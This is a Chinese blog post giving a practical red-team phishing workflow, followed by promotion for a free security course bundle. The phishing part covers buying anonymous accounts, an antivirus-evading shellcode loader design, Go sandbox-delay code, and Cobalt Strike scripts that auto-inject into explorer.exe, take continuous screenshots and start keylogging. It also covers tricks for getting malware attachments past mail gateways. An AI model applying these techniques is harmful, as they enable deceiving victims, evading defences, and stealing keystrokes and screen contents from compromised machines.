社工钓鱼基本流程+思维导图（附零基础入门资料）

最新推荐文章于 2024-07-23 15:51:51 发布

网安教程

最新推荐文章于 2024-07-23 15:51:51 发布

阅读量648

点赞数

分类专栏：网络安全计算机技术职业职场文章标签：开发语言安全运维网络安全

本文链接：https://blog.csdn.net/weixin_51725318/article/details/133855079

版权

网络安全同时被 3 个专栏收录

474 篇文章 111 订阅

订阅专栏

职业职场

321 篇文章 1 订阅

订阅专栏

计算机技术

253 篇文章 0 订阅

订阅专栏

文章目录

前言
学习计划安排
资料领取

前言

穷则社工钓鱼，达则0day炸场-微步在线，借用微步公众号的一句话，没有后端资源支持的情况下，社工钓鱼必学技能，毕竟正面打不动，代码审不动，0day又没有是日常，下文讲解自己对于社工钓鱼的思路。

社交账号

准备一些社交账号，如微信、QQ、脉脉、BOSS直聘、猎聘，手机号可以购买阿里小号/和多号。其中微信可以用辅助注册或者阿里小号/和多号注册，如果你有匿名的渠道购买更好。

在这里插入图片描述

邮箱方面，一般常用QQ邮箱、163邮箱，这些目前还是有渠道可以购买的，没钱或者担心购买不可靠，跟身边亲朋好友借也行。

免杀马

免杀的马子是必备的，如果你是和我一样的免杀弟弟，我推荐先学习shellcode loader的一些编写思路

https://github.com/xf555er/ShellcodeLoader

基本加载器思路为shellcode申请内存(可读可写) -> 载入内存 -> 执行内存


申请内存：VirtualAlloc
载入内存：memcpy
执行内存：CreateThread WaitForSingleObject

针对这三个过程可以使用不同的函数来达到规避杀软的效果，例如申请内存还可以用GlobalAlloc、CoTaskMemAlloc函数，执行内存可以用回调函数EnumFontsW、EnumUILanguages、EnumFontFamiliesA。

主要还是查文档自己多动手，学完就算不会写免杀马，改改别人GitHub的马子，过国内360火绒基本没问题，然后就是研究下捆绑exe释放正常文件，搞不懂直接给马子弹个框文件已损坏，无法打开也行，不然经常出现对方问你这文件怎么打不开…

平时钓鱼的马子经常要改图标加签名之类的，推荐如下项目，在原项目360QVM_bypass的基础上，进行修改增加签名功能。

https://github.com/S9MF/my_script_tools/blob/main/360QVM_bypass-public/README.md

bypass沙箱

为了延长马子存活时间，基本的沙箱对抗少不了，毕竟有防守人员的话，你投递的木马基本都得沙箱走一走，以微步沙箱为例，最简单的循环打印。

使用sleep函数延迟执行容易被hook，修改为0，可以编写循环打印来延迟程序时间，来绕过沙箱检测，因为沙箱运行程序是有时间限制的。


//循环打印进行延时 运行1m2s后执行shellcode 沙箱分析时间没那么久 可以绕过沙箱检测
func add() {
    start := time.Now() //获取当前时间
    //1000000  1m2.793228s
    sum, i := 0, 1
    for i < 1000000 {
        fmt.Println(i)
        sum += i
        i++
    }
    elapsed := time.Since(start)
    fmt.Println("该函数执行完成耗时：", elapsed)
}

将如上代码放在shellcode执行前就行。

信息收集

思维导图如下，每个人都有自己的思路，我就简单讲解几个。

零零信安直接搜索公司名称，得到一些邮箱地址

拿邮箱后缀+关键字去微信搜一搜，Google、百度等搜索引擎也可以搜，可以获取业务招聘相关邮箱信息、手机号等。

如下组合：


@xxx.com 招聘 
@xxx.com 校招 
@xxx.com 投标 
@xxx.com 联系方式

C2搭建准备

常用的就cs，基本的套层CDN然后c2上线端口反代下，这里我会用到cs插件脚本

https://github.com/S9MF/my_script_tools/blob/main/CS%E6%8F%92%E4%BB%B6/README.md

常用的就是上线提醒、自动迁移进程


#自动迁移进程
    sub callback{
        $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
        # 要迁移的进程
        $listener = "ecloud";
        # 监听器名字，此处为ecloud，记得修改为自己的
        if ($2 ismatch $regex){
            $pid = matched()[1];
            $inject_pid = $pid;
            if (-is64 $1){
                $arch = "x64";
            }
            else{
                $arch = "x86";
            }
            binject($1, $pid, $listener, $arch);
        }
    }
    if($inject_pid != beacon_info($1,"pid")){
        bps($1, &callback);
    }

还有上线自动截图功能，就算目标掉了起码还有张图证明上线过


#只截一张图
    #binput($1, "screenshot");
    #bscreenshot($1);

    #连续截图
    binput($1, "screenwatch");
    bscreenwatch($1);

其他的上线自动执行shell命令、键盘记录看自己需求吧


#执行自定义cmd命令
    bshell($1, "ipconfig /all");
    #键盘记录
    bkeylogger($1);

还有其他需求可以去翻翻文档Aggressor Script

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm

如果你有好用稳定的权限提升维持工具、如Bypass UAC、以及计划任务、服务，可以考虑下写个cs脚本上线自动bypass uac，加权限维持。

邮件网关/沙箱

默认对面有邮件网关/沙箱设备，针对邮件正文和附件要有一定处理或者技巧。

针对正文

不带知名公司名称如脉脉、BOSS直聘不然容易被当成广告邮件，不把附件解密密码放在正文，容易被沙箱识别密码分析附件。

针对附件

文件名加密，解压密码写在附件名上。

开钓

通过之前的准备，我们已经有了一些可供尝试的信息，此时需要构建话术剧本然后去钓鱼。

上线后的操作

参考L33h0m师傅的文章：分享我的CS钓鱼流程导图（权限维持+信息收集+后渗透阶段）

https://www.t00ls.com/articles-69037.html

总结

本文讲解了我对社工钓鱼的基本流程，偏向于思路，师傅们有其他思路欢迎在评论区留言，学习交流。

参考


https://github.com/Pizz33/360QVM_bypass
https://github.com/xf555er/ShellcodeLoader
https://www.t00ls.com/articles-69037.htm

*内容来源：先知社区，内容排版：潇湘信安公众号，侵删

-END-

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴文末免费领取哦，无偿分享！！！

学习计划安排

学习路线图大纲总览

我一共划分了六个阶段，但并不是说你得学完全部才能上手工作，对于一些初级岗位，学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴文末免费领取哦，无偿分享！！！

【一一帮助网络安全学习，以下所有资源免费领取一一】
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。